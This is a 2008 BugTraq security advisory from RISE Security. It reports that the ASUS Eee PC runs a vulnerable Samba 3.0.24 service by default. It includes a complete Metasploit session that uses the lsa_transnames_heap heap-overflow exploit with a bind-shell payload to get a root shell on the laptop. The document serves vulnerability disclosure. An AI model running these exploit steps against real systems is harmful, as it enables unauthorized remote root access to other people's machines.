BugTraq
ASUS Eee PC rooted out of the box Feb 08 2008 04:46PM
RISE Security (advisories risesecurity org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

We recently acquired an ASUS Eee PC (if you want to know more about it,
a lot of reviews are available on internet). The first thing we did when
we put our hands at the ASUS Eee PC was to test its security. The ASUS
Eee PC comes with a customized version of Xandros operating system
installed, and some other bundled software like Mozilla Firefox, Pidgin,
Skype and OpenOffice.org.

Analysing the running processes of the ASUS Eee PC, the first thing that
caught our attention was the running smbd process (the sshd daemon was
started by us, and is not enabled by default).

eeepc-rise:/root> ps -e
PID TTY TIME CMD
1 ? 00:00:00 fastinit
2 ? 00:00:00 ksoftirqd/0
3 ? 00:00:00 events/0
4 ? 00:00:00 khelper
5 ? 00:00:00 kthread
25 ? 00:00:00 kblockd/0
26 ? 00:00:00 kacpid
128 ? 00:00:00 ata/0
129 ? 00:00:00 ata_aux
130 ? 00:00:00 kseriod
148 ? 00:00:00 pdflush
149 ? 00:00:00 pdflush
150 ? 00:00:00 kswapd0
151 ? 00:00:00 aio/0
152 ? 00:00:00 unionfs_siod/0
778 ? 00:00:00 scsi_eh_0
779 ? 00:00:00 scsi_eh_1
799 ? 00:00:00 kpsmoused
819 ? 00:00:00 kjournald
855 ? 00:00:00 fastinit
857 ? 00:00:00 sh
858 ? 00:00:00 su
859 tty3 00:00:00 getty
862 ? 00:00:00 startx
880 ? 00:00:00 xinit
881 tty2 00:00:06 Xorg
890 ? 00:00:00 udevd
952 ? 00:00:00 ksuspend_usbd
953 ? 00:00:00 khubd
1002 ? 00:00:00 acpid
1027 ? 00:00:00 pciehpd_event
1055 ? 00:00:00 ifplugd
1101 ? 00:00:00 scsi_eh_2
1102 ? 00:00:00 usb-storage
1151 ? 00:00:00 icewm
1185 ? 00:00:01 AsusLauncher
1186 ? 00:00:00 icewmtray
1188 ? 00:00:01 powermonitor
1190 ? 00:00:00 minimixer
1191 ? 00:00:00 networkmonitor
1192 ? 00:00:00 wapmonitor
1193 ? 00:00:00 x-session-manag
1195 ? 00:00:00 x-session-manag
1200 ? 00:00:00 x-session-manag
1201 ? 00:00:00 dispwatch
1217 ? 00:00:00 cupsd
1224 ? 00:00:00 usbstorageapple
1234 ? 00:00:00 kondemand/0
1240 ? 00:00:00 portmap
1248 ? 00:00:00 keyboardstatus
1272 ? 00:00:00 memd
1279 ? 00:00:00 scim-helper-man
1280 ? 00:00:00 scim-panel-gtk
1282 ? 00:00:00 scim-launcher
1297 ? 00:00:00 netserv
1331 ? 00:00:00 asusosd
1476 ? 00:00:00 xandrosncs-agen
1775 ? 00:00:00 dhclient3
2002 ? 00:00:00 nmbd
2004 ? 00:00:00 smbd
2005 ? 00:00:00 smbd
2322 ? 00:00:00 sshd
2345 ? 00:00:00 sshd
2356 pts/0 00:00:00 bash
2362 pts/0 00:00:00 ps
eeepc-rise:/root>

Retrieving the the smbd version, we discovered that it runs a vulnerable
version of Samba (Samba lsa_io_trans_names Heap Overflow), which exploit
we published earlier last year.

eeepc-rise:/root> smbd --version
Version 3.0.24
eeepc-rise:/root>

With this information, we ran our exploit against the ASUS Eee PC using
the Debian/Ubuntu target (Xandros is based on Corel Linux, which is
Debian based).

msf > use linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > set RHOST 192.168.50.10
RHOST => 192.168.50.10
msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell_bind_tcp
PAYLOAD => linux/x86/shell_bind_tcp
msf exploit(lsa_transnames_heap) > show targets

Exploit targets:

Id Name
-- ----
0 Linux vsyscall
1 Linux Heap Brute Force (Debian/Ubuntu)
2 Linux Heap Brute Force (Gentoo)
3 Linux Heap Brute Force (Mandriva)
4 Linux Heap Brute Force (RHEL/CentOS)
5 Linux Heap Brute Force (SUSE)
6 Linux Heap Brute Force (Slackware)
7 DEBUG

msf exploit(lsa_transnames_heap) > set TARGET 1
TARGET => 1
msf exploit(lsa_transnames_heap) > exploit
[*] Started bind handler
[*] Creating nop sled....
...
[*] Trying to exploit Samba with address 0x08415000...
[*] Connecting to the SMB service...
[*] Binding to
12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc]
...
[*] Bound to
12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc]
...
[*] Calling the vulnerable function...
[+] Server did not respond, this is expected
[*] Command shell session 1 opened (192.168.50.201:33694 ->
192.168.50.10:4444)
msf exploit(lsa_transnames_heap) > sessions -i 1
[*] Starting interaction with 1...

uname -a
Linux eeepc-rise 2.6.21.4-eeepc #21 Sat Oct 13 12:14:03 EDT 2007 i686
GNU/Linux
id
uid=0(root) gid=0(root) egid=65534(nogroup) groups=65534(nogroup)

Easy to learn, Easy to work, Easy to root.

The original blog post and more information can be found in our
website at http://risesecurity.org/.

Best regards,
RISE Security
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQFHrIdmhFjK78TGSUERAnQRAKC+y18h92I4cTnjmDJkTKfdtbno2ACgkdqs
v7aF1eU5H9uSfL4zU5AWCB4=
=pDq2
-----END PGP SIGNATURE-----

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus